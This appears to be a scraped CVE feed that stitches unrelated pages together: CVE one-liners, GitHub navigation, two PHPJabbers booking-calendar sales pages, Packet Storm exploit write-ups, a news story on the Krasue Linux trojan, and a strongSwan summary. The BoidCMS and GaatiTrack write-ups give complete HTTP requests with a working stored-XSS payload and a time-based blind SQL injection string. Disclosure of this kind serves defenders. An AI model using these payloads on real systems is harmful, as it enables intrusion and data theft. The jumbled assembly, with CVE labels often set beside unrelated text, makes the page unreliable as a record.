TOTOLINK N300RT version 3.2.4-B20180730.0906 has a post-authentication RCE due to incorrect access control, allows attackers can bypass front-end security restrictions and execute arbitrary code.

*   *   Actions
        
        Automate any workflow
        
    *   Packages
        
        Host and manage packages
        
    *   Security
        
        Find and fix vulnerabilities
        
    *   Codespaces
        
        Instant dev environments
        
    *   Copilot
        
        Write better code with AI
        
    *   Code review
        
        Manage code changes
        
    *   Issues
        
        Plan and track work
        
    *   Discussions
        
        Collaborate outside of code
        
    

*   *   GitHub Sponsors
        
        Fund open source developers
        
    
    *   The ReadME Project
        
        GitHub community articles
        
    
*   Pricing

**Search code, repositories, users, issues, pull requests...**

**Provide feedback**

**Saved searches****Use saved searches to filter your results more quickly**

Sign up

CVE-2023-48860: security_research/TOTOLINK-N300RT-RCE.md at main · xieqiang11/security_research

A lack of rate limiting in pjActionAJaxSend in Time Slots Booking Calendar 4.0 allows attackers to cause resource exhaustion.

Make appointment booking and online scheduling easy with our time slot booking system!

Version: 3.3

Time Slots Booking Calendar is a real-time appointment calendar and online booking system that allows clients to book appointments with you. With the Time Slots Booking Calendar, you can schedule meetings both for individual and group appointments, while avoiding double bookings. Whether you're a hairdresser, therapist, or wellness worker, this is the perfect appointment booking software for your booking page. The setup is simple, with copy-paste script integration. Let your visitors schedule appointments, easily!

**Time Slots Booking Calendar**

*   Highlights
*   Features
*   Demo
*   Faq
*   Pricing

**Product Highlights**

Does your business involve scheduled services? Then you should consider adding a simple appointment scheduling software to your website to help you automate the booking process. Here are the features you can benefit from with our Time Slots Booking Calendar:

Configure time slots

Configure time slot length and add either regular or custom time slot lengths for any calendar date.

Front-end layouts

There are two front-end layouts for Time Slots Booking Calendar that work well both for iOS and Android devices. Switch between them using a simple drop-down menu.

Accept deposit payments

The time slot calendar supports online payments via PayPal, Authorize.net, as well as credit card payments and wire transfers.

Translate the calendar

Translate the booking calendar to any language you like thanks to a simple built-in language editor available in the Admin Panel.

Manage working hours

Edit and update your business hours as well as regular and custom work dates. This includes editing slot lengths, displaying lunch breaks, and adding days off.

Email & SMS notifications

Set default email & SMS reminders and send them out both to your own staff as well as clients to help reduce cancellations and no-shows.

Book group appointments

Use the time slot booking system to set up an online booking system for reserving group appointments.

Make custom changes

Get the Developer License and modify the Time Slots Booking Calendar according to your needs. Or ask us to do it for you! Compare licenses

SPECIAL OFFER

**Time Slots Booking Calendar for €4.59 Only**

Get all 65 PHPJabbers scripts in a bundle for just €279.

**Live Demo**

Below is a preview of the Time Slots Booking Calendar. You can see both the front and the back-end view and test out all the functionalities.  
If you have any questions, do not hesitate to contact us.

**Time Slots Booking Calendar**

**Key Benefits**

Script Modifications

Remote Hosting

High Performance

Installation Support

Extended Licence

**Pricing**

You can buy the Time Slots Booking Calendar both with a Developer and a User License – compare them below.  
Do you need a custom modification? We'll happily do it for you! Just contact us, describe what you need, and we'll send you a quote!

Mega Sale deal

€4.59

per script

Free installation support

Modify the code

Copyright removal

Apply for Extended Licence and advertise our product on your website

Unlimited installations

Free updates

Get all minor updates for free

Custom modifications

Contact us and you'll receive quotation for the custom changes you may need

buy now

Free installation support

Modify the code

Copyright removal

Apply for Extended Licence and advertise our product on your website

Unlimited installations

Free updates

Get all minor updates for free

Custom modifications

Modify the software on your own or contact us and we will give you a quote

buy now

Mega Sale deal

€4.59 per script

Get 65 PHP Scripts

Modify the code

Copyright removal

Apply for Extended Licence and advertise our product on your website

Unlimited installations

Free updates

Get all minor updates for free

Custom modifications

Modify the software on your own or contact us and we will give you a quote

buy now

LIMITED OFFER

Get the Mega Sale bundle deal with all the PHP scripts you'll ever need for a total of

€279

VIEW DETAILS

**Testimonials**

Let our clients share their experience with our appointment booking calendar and how the script has improved their online business.

“

Having wasted 3 days on finding a workable open source calendar booking script I finally decided to buy your excellent Time Slots Booking Calendar in order to run a tennis court booking system. The script was 90% perfect for the job but required some key modifications such as repeat and block booking and deletion. The service provided by PHPJabbers was incredibly fast, efficient and inexpensive. Thank you to Alexander 'Sasho' Valkanov for a superb job. I am happy to thoroughly recommend your PHP booking scripts and service to everyone. Fantastic service, really impressed.  
U2R Design, United Kingdom

Chris Woods

“

I am really happy to have found PHPJabbers.com. This is the first time I outsourced work and so I was quite nervous about doing it. But PHPJabbers team did a great job. They were able to make all the modifications I requested on quite a difficult booking system job. Kosta Todorov is very smart. I couldn't ask for a better team.

Mia Johnson

“

PHPjabbers has the most in-depth calendar software solution I've found on the web. The time slot booking system functions are great and offers everything we need and more. More importantly, the support we have received has been the best ever!!! They are fast, reliable and affordable. Thank you so much for making this booking calendar script such a wonderful solution for us!

Zach Kosturos

**FAQ & Knowledge Base**

Pre-Sale FAQ

Read the most Frequently Asked Questions about this script, its features and use.

Support Service FAQ

Read more about our Support Service and how we can help you install Time Slots Booking Calendar.

Custom Mods FAQ

Do you need something changed? We offer customization services.

How to install a Script

See how easy it is to install the script. Just follow the instructions or leave it all to us.

FTP Clients

See how to upload our scripts using different FTP clients.

PHP Framework Used

We use our own in-house build framework which is really easy to understand and work with.

Our Services

We offer a wide range of web development       services.

License Types Explained

User and Developer licence available. We also have a special Extended Licence for webmasters.

Didn’t find exactly what you were looking for?

Contact Us

**Related Scripts**

**Appointment Scheduler**

**Availability Booking Calendar**

**Event Booking Calendar**

**Class Scheduling System**

**Service Booking Script**

**Event Ticketing System**

CVE-2023-48833: Time Slots Booking Calendar | PHPJabbers

A lack of rate limiting in pjActionAJaxSend in Availability Booking Calendar 5.0 allows attackers to cause resource exhaustion.

A customizable PHP booking calendar script with multi-calendar support

Version: 5.0

The Availability Booking Calendar is a PHP calendar booking system that shows availability, allows bookings with a few easy steps, accepts online payments, and lets you manage reservations and bookings. Our script is suitable for single accommodation facilities such as holiday rentals, private villas, and apartments. Availability Booking Calendar script allows you to change colors, edit languages, create booking forms, and control settings. Get the PHP booking calendar script with the Developer License and customize it as you need.

**Availability Booking Calendar**

*   Highlights
*   Features
*   Demo
*   Faq
*   Knowledge Base
*   Pricing

**Product Highlights**

Add a smart reservation calendar to your website and show your clients your service schedule online so that they can easily book and pay in advance. The Availability Booking Calendar script will facilitate and improve both your customer relations as well as administration.

Multi-Calendar Support

Create as many availability booking calendars as you need. Each reservation calendar can be configured separately.

Multiple Languages

A language editor allows you to translate the PHP booking calendar script and add multiple languages on the front end.

Customizable Appearance

Manage booking calendars through the Admin Panel and make them perfectly fit your website style and content.

High Speed & Performance

The calendar booking system works flawlessly with heavy databases and loads quickly without reloading the entire web page.

Reservation Management

The Availability Booking Calendar enables script admins to easily review and manage both reservations and client details.

Email & SMS Notifications

The calendar booking system can be configured to send out email & SMS notifications to users upon new bookings and payments.

Payment Integration

The built-in payment module accepts online payments via PayPal and Authorize.net and also lets you process offline payments.

PHP Source Code Customization

You can either buy the Developer License and make your own changes, or get the User License and request the custom modifications from us.

SPECIAL OFFER

**Availability Booking Calendar for €4.59 Only**

Get all 65 PHPJabbers scripts in a bundle for just €279.

**Live Demo**

Preview both the front end and back end of the Availability Booking Calendar script and test out the whole functionality.  
If you have any questions or need technical advice, go ahead and contact us.

**Availability Booking Calendar**

**Key Benefits**

Key Features

Script Modifications

Customizations

Remote Hosting

Extended Licence

**Pricing**

You can buy the Availability Booking Calendar both with a Developer and a User License – compare them below.  
Do you need a custom modification? We'll happily do it for you! Just contact us, describe what you need, and we'll send you a quote!

Mega Sale deal

€4.59

per script

Free installation support

Modify the code

Copyright removal

Apply for Extended Licence and advertise our product on your website

Unlimited installations

Free updates

Get all minor updates for free

Custom modifications

Contact us and you'll receive quotation for the custom changes you may need

buy now

Free installation support

Modify the code

Copyright removal

Apply for Extended Licence and advertise our product on your website

Unlimited installations

Free updates

Get all minor updates for free

Custom modifications

Modify the software on your own or contact us and we will give you a quote

buy now

Mega Sale deal

€4.59 per script

Get 65 PHP Scripts

Modify the code

Copyright removal

Apply for Extended Licence and advertise our product on your website

Unlimited installations

Free updates

Get all minor updates for free

Custom modifications

Modify the software on your own or contact us and we will give you a quote

buy now

LIMITED OFFER

Get the Mega Sale bundle deal with all the PHP scripts you'll ever need for a total of

€279

VIEW DETAILS

**Testimonials**

Let our clients share their experience with our PHP Availability Booking Calendar script and how it has improved their online business.

“

I highly recommend the Availability Booking Calendar script. It is easy to install and administrate, yet it offers powerful features. This calendar booking system is also simple to use by customers. The PHPJabbers support is very quick and prices are very reasonable.

Axel Schmidt

“

I was looking for a PHP booking script and came across phpjabbers.com, but I wanted quite a few mods done. These guy sorted them out quickly and efficiently. The after sales support is fantastic as well. Thanks, team!

Mark Thompson

“

After looking at the availability booking calendar script and studied it I bought it. While Swedish is not the most used language it started out with problems to use the special characters. It took less than one hour for PHPJabbers support team to solve this for me. Now the booking form works perfectly - well invested money!

Anders Sjoberg

**FAQ & Knowledge Base**

Pre-Sale FAQ

Read the most Frequently Asked Questions about this script, its features and use.

Support Service FAQ

Read more about our Support Service and how we can help you install Availability Booking Calendar.

Custom Mods FAQ

Do you need something changed? We offer customization services.

How to install a Script

See how easy it is to install the script. Just follow the instructions or leave it all to us.

PHP Framework Used

We use our own in-house build framework which is really easy to understand and work with.

Our Services

We offer a wide range of web development       services.

License Types Explained

User and Developer licence available. We also have a special Extended Licence for webmasters.

Didn’t find exactly what you were looking for?

Contact Us

**Related Scripts**

**Event Booking Calendar**

**Time Slots Booking Calendar**

**Rental Property Booking Calendar**

**Availability Calendar**

**Appointment Scheduler**

**Hotel Booking System**

CVE-2023-48831: Availability Booking Calendar | Calendar Booking System

BoidCMS 2.0.1 is vulnerable to Multiple Stored Cross-Site Scripting (XSS) issues via the title, subtitle, footer, or keywords parameter in a page=create action.

    # Exploit Title: BoidCMS v2.0.1 - Multiple Stored XSS# Date: 13/11/2023# Exploit Author: BugsBD Limited# Discover by: Rahad Chowdhury# Vendor Homepage: https://boidcms.github.io/#/# Software Link: https://github.com/BoidCMS/BoidCMS/archive/refs/tags/v2.0.1.zip# Version: v2.0.1# Tested on: Windows 10, PHP 8.2.4, Apache 2.4.56# CVE: CVE-2023-48824Descriptions:BoidCMS v2.0.1 is vulnerable to Multiple Stored Cross-Site Scripting(XSS) Authenticated vulnerabilities in the "title, subtitle, footer,keywords" parameters of&nbsp;settings, create page.Steps to Reproduce:1. Request:POST /BoidCMS/admin?page=create HTTP/1.1Host: 192.168.1.74User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0)Gecko/20100101 Firefox/119.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflate, brContent-Type: multipart/form-data;boundary=---------------------------9882691211259772119227456445Content-Length: 1492Origin: http://192.168.1.74Connection: closeReferer: http://192.168.1.74/BoidCMS/admin?page=createCookie: PHPSESSID=51i07vv0i4bqf0s9sl14tshq20;KOD_SESSION_SSO=8lu85nmqbd7o912f2lldm1g08k;KOD_SESSION_ID_53f4f=p7am25v0dladkuqetsqer4mdhcUpgrade-Insecure-Requests: 1-----------------------------9882691211259772119227456445Content-Disposition: form-data; name="type"post-----------------------------9882691211259772119227456445Content-Disposition: form-data; name="title"test-----------------------------9882691211259772119227456445Content-Disposition: form-data; name="descr"test-----------------------------9882691211259772119227456445Content-Disposition: form-data; name="keywords"test-----------------------------9882691211259772119227456445Content-Disposition: form-data; name="content"test-----------------------------9882691211259772119227456445Content-Disposition: form-data; name="permalink"-----------------------------9882691211259772119227456445Content-Disposition: form-data; name="tpl"theme.php-----------------------------9882691211259772119227456445Content-Disposition: form-data; name="thumb"-----------------------------9882691211259772119227456445Content-Disposition: form-data; name="date"2023-12-02T19:41-----------------------------9882691211259772119227456445Content-Disposition: form-data; name="pub"true-----------------------------9882691211259772119227456445Content-Disposition: form-data; name="token"83f330c1fea7a77a033324b848b5cd623d17d5cf25de1975ff2cce32badbe9cd-----------------------------9882691211259772119227456445Content-Disposition: form-data; name="create"Create-----------------------------9882691211259772119227456445--2. Now use xss payload "><img src=x onerror=alert(1)> on "title,subtitle, footer, keywords" parameters.3. Save and check home.## Reproduce:[href](https://github.com/bugsbd/CVE/tree/main/2023/CVE-2023-48824)

CVE-2023-48824: BoidCMS 2.0.1 Cross Site Scripting ≈ Packet Storm

A Blind SQL injection issue in ajax.php in GaatiTrack Courier Management System 1.0 allows an unauthenticated attacker to inject a payload via the email parameter during login.

    # Exploit Title: GaatiTrack Courier Management System v1.0 - SQL Injection# Date: 13/11/2023# Exploit Author: BugsBD Limited# Discover by: Rahad Chowdhury# Vendor Homepage: https://www.mayurik.com/# Software Link:https://www.mayurik.com/source-code/P0998/best-courier-management-system-project-in-php# Version: v1.0# Tested on: Windows 10, PHP 8.2.4, Apache 2.4.56# CVE: CVE-2023-48823Descriptions:Blind SQL injection in ajax.php in GaatiTrack Courier ManagementSystem v1.0 allows an unauthenticated attacker to insert malicious SQLqueries via email parameter.Steps to Reproduce:1. Request:POST /gaatitrack/ajax.php?action=login HTTP/1.1Host: 192.168.1.74User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0)Gecko/20100101 Firefox/119.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflate, brContent-Type: application/x-www-form-urlencoded; charset=UTF-8X-Requested-With: XMLHttpRequestContent-Length: 83Origin: http://192.168.1.74Connection: closeReferer: http://192.168.1.74/gaatitrack/login.phpCookie: PHPSESSID=abl1dci7hob2f90sf5ag9k00mp;KOD_SESSION_SSO=8lu85nmqbd7o912f2lldm1g08k;KOD_SESSION_ID_53f4f=p7am25v0dladkuqetsqer4mdhcemail=test%40test.com&password=1234562. Now use blind sqli query after email parameter. So your request data will be:POST /gaatitrack/ajax.php?action=login HTTP/1.1Host: 192.168.1.74User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0)Gecko/20100101 Firefox/119.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflate, brContent-Type: application/x-www-form-urlencoded; charset=UTF-8X-Requested-With: XMLHttpRequestContent-Length: 83Origin: http://192.168.1.74Connection: closeReferer: http://192.168.1.74/gaatitrack/login.phpCookie: PHPSESSID=abl1dci7hob2f90sf5ag9k00mp;KOD_SESSION_SSO=8lu85nmqbd7o912f2lldm1g08k;KOD_SESSION_ID_53f4f=p7am25v0dladkuqetsqer4mdhcemail=test%40test.com'XOR(if(now()=sysdate()%2Csleep(4)%2C0))XOR'&password=123456## Reproduce:[href](https://github.com/bugsbd/CVE/tree/main/2023/CVE-2023-48823)

CVE-2023-48823: GaatiTrack Courier Management System 1.0 SQL Injection ≈ Packet Storm

A Cross Site Scripting vulnerability in Availability Booking Calendar 5.0 allows an attacker to inject JavaScript via the name, plugin_sms_api_key, plugin_sms_country_code, uuid, title, or country name parameter to index.php.

    # Exploit Title: Multiple Cross Site Scripting in PHPJabbers AvailabilityBooking Calendar v5.0# Date: 12/11/2023# Exploit Author: BugsBD Security Researcher (Orpon)# Vendor Homepage: https://www.phpjabbers.com/# Software Link:https://www.phpjabbers.com/availability-booking-calendar/#sectionDemo# Version: v5.0# Tested on: Windows 10, Linux# CVE: CVE-2023-48208Description:PHPJabbers Availability Booking Calendar v5.0 is vulnerable to MultipleStored Cross-Site Scripting (XSS) vulnerabilities in the "name,plugin_sms_api_key, plugin_sms_country_code, uuid, title, country name"parameters of index.php page.Steps to Reproduce:1. Login your panel2. Go to System Menu then click SMS Settings.3. Then use any XSS Payload in "SMS API Key", "Default Country Code" inputfield and Save.4. You will see XSS pop up.## Reproduce:[href](https://github.com/bugsbd/CVE/tree/main/2023/CVE-2023-48208)

CVE-2023-48208: PHPJabbers Availability Booking Calendar 5.0 Cross Site Scripting ≈ Packet Storm

Availability Booking Calendar 5.0 is vulnerable to Multiple HTML Injection issues via SMS API Key or Default Country Code.

    # Exploit Title: PHPJabbers Availability Booking Calendar v5.0 - HTML Injection# Date: 13/11/2023# Exploit Author: BugsBD Limited# Discover by: Rahad Chowdhury# Vendor Homepage: https://www.phpjabbers.com/# Software Link:https://www.phpjabbers.com/availability-booking-calendar/#sectionDemo# Version: v5.0# Tested on: Windows 10, Windows 11, Linux# CVE-2023-48825Descriptions:HTML injection, also known as HTML code injection or cross-sitescripting (XSS), is a web security vulnerability that allows anattacker to inject malicious code into a web page that is then viewedby other users. This can lead to various attacks, such as stealingsensitive information, session hijacking, defacement of websites, ordelivering malware to users.Steps to Reproduce:1. Login your panel2. Go to System Menu then click SMS Settings.3. Then use any HTML Tag in "SMS API Key", "Default Country Code"input field and Save.4. You will see HTML code working here.## Reproduce:[href](https://github.com/bugsbd/CVE/tree/main/2023/CVE-2023-48825)

CVE-2023-48825: PHPJabbers Availability Booking Calendar 5.0 HTML Injection ≈ Packet Storm

Squidex before 7.9.0 allows XSS via an SVG document to the Upload Assets feature. This occurs because there is an incomplete blacklist in the SVG inspection, allowing JavaScript in the SRC attribute of an IFRAME element. An authenticated attack with assets.create permission is required for exploitation.

CVE-2023-46857: News

A previously unknown Linux remote access trojan called Krasue has been observed targeting telecom companies in Thailand by threat actors to main covert access to victim networks at lease since 2021.
Named after a nocturnal female spirit of Southeast Asian folklore, the malware is "able to conceal its own presence during the initialization phase," Group-IB said in a report

Malware / Security Breach

A previously unknown Linux remote access trojan called Krasue has been observed targeting telecom companies in Thailand by threat actors to main covert access to victim networks at lease since 2021.

Named after a nocturnal female spirit of Southeast Asian folklore, the malware is "able to conceal its own presence during the initialization phase," Group-IB said in a report shared with The Hacker News.

The exact initial access vector used to deploy Krasue is currently not known, although it's suspected that it could be via vulnerability exploitation, credential brute-force attacks, or downloaded as part of a bogus software package or binary. The scale of the campaign is

UPCOMING WEBINAR

Cracking the Code: Learn How Cyber Attackers Exploit Human Psychology

Ever wondered why social engineering is so effective? Dive deep into the psychology of cyber attackers in our upcoming webinar.

Join Now

The malware's core functionalities are realized through a rootkit that allows it to maintain persistence on the host without attracting any attention. The rootkit is derived from open-source projects such as Diamorphine, Suterusu, and Rooty.

This has raised the possibility that Krasue is either deployed as part of a botnet or sold by initial access brokers to other cybercriminals, such as ransomware affiliates, who are looking to obtain access to a specific target.

"The rootkit can hook the \`kill()\` syscall, network-related functions, and file listing operations in order to hide its activities and evade detection," Group-IB malware analyst Sharmine Low said.

"Notably, Krasue uses RTSP (Real Time Streaming Protocol) messages to serve as a disguised 'alive ping,' a tactic rarely seen in the wild."

The trojan's command-and-control (C2) communications further allow it to designate a communicating IP as its master upstream C2 server, get information about the malware, and even terminate itself.

Krasue also shares several source code similarities with another Linux malware named XorDdos, indicating that it has been developed by the same author as the latter, or by actors who had access to its source code.

"The information available is not enough to put forward a conclusive attribution as to the creator of Krasue, or the groups that are leveraging it in the wild, but the fact that these malicious programs are able to remain under the radar for extended periods makes it clear that continuous vigilance and better security measures are necessary," Low said.

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

New Stealthy 'Krasue' Linux Trojan Targeting Telecom Firms in Thailand

strongSwan before 5.9.12 has a buffer overflow and possible unauthenticated remote code execution via a DH public value that exceeds the internal buffer in charon-tkm's DH proxy. The earliest affected version is 5.3.0. An attack can occur via a crafted IKE_SA_INIT message.

Tag

#auth